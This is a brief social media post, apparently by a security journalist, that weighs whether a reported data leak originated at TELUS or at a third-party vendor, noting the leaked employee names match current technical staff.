@Ax_Sharma
Ax Sharma
2 years
Too early to conclude that an incident indeed at TELUS or rule out third-party vendor breach. Employee names do check out though and correspond to present-day technical staff, like devs.
Tweet media one
2
4
17